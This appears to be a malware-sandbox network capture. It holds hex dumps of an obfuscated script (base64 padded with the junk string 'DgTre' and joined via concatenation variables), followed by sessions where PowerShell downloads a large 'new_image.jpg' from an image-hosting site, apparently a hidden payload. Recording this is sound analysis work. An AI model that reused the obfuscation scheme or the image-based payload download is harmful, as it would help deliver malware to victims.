2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 Data Ascii: gTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & matozinhos & calondro & matozinhos & "Q
2024-04-23 05:53:23 UTC	1089	IN	Data Raw: 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 Data Ascii: gTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & matozinhos & calondro & matozinhos & "QB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & matozinhos & calondro & matozinhos & "DgTreDgTregDgTreCQDgTre
2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 31 34 66 31 0d 0a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 34 44 67 54 72 65 44 73 44 67 54 72 Data Ascii: 14f1inhos & calondro & matozinhos & "DgTreBJDgTreG4DgTre" & matozinhos & calondro & matozinhos & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & matozinhos & calondro & matozinhos & "QB4DgTreDsDgTr
2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 6b 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 74 44 67 54 72 65 43 34 44 67 54 72 65 55 67 42 Data Ascii: TreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTre" & matozinhos & calondro & matozinhos & "QBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTre" & matozinhos & calondro & matozinhos & "QBtDgTreC4DgTreUgB
2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 65 61 51 42 79 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 59 51 42 33 44 67 54 72 65 48 67 44 67 54 72 65 4c 77 42 79 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 79 44 67 54 72 65 47 55 44 67 54 72 65 4c 77 42 74 44 67 54 72 65 47 38 44 67 54 72 65 59 77 44 67 54 72 65 75 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 77 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 79 44 67 54 72 65 47 55 44 67 54 72 65 61 44 67 54 72 65 42 30 44 67 54 72 65 47 34 44 67 54 72 65 59 51 42 77 44 67 54 72 65 43 38 44 67 54 72 65 4c 77 44 67 54 72 65 36 44 67 54 72 65 48 4d 44 67 54 72 65 63 44 67 54 72 65 42 30 44 67 54 72 65 48 51 44 67 54 72 65 61 Data Ascii: eaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwByDgTreG8DgTrecgByDgTreGUDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTre" & matozinhos & calondro & matozinhos & "QBwDgTreG8DgTrecgByDgTreGUDgTreaDgTreB0DgTreG4DgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTrea

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49729	172.67.215.45	443	6412	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 05:53:27 UTC	124	OUT	GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-04-23 05:53:27 UTC	700	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 05:53:27 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT ETag: "66205484-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 623 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsNiz9oKOGxa38vOvjlk7%2BzcgnjVCDvAPQhW%2BTHnvEOVXLaQ6Iox6fiosGtb%2B3jbbKRvBFW5k%2BDwfSseiiHXS5Hju8O3eEUS%2BoJ3IuDKAJFoAo6cMJBFVHWfF3spI9I9J%2BNKeGCVTBv8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 878b97e108901a13-EWR alt-svc: h3=":443"; ma=86400
2024-04-23 05:53:27 UTC	669	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-23 05:53:27 UTC	1369	IN	Data Raw: de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49731	172.67.215.45	443	6412	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 05:53:28 UTC	100	OUT	GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1 Host: uploaddeimagens.com.br
2024-04-23 05:53:28 UTC	698	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 05:53:28 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT ETag: "66205484-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 624 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqxYiywktaZ3qtM5iAw8SEpCtJoPHqnX0reTncLYkH8roZQ2MzU8fFvlFR9Q1melIVAl2gfeV%2FHng2rdseElplUmjvI0n24SIEiHfAw%2BSrWqBPrr%2F7ZakVR0yTFn%2Ffox2aoi2%2BqfPAEC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 878b97eadb6241d5-EWR alt-svc: h3=":443"; ma=86400
2024-04-23 05:53:28 UTC	671	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-23 05:53:28 UTC	1369	IN	Data Raw: 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
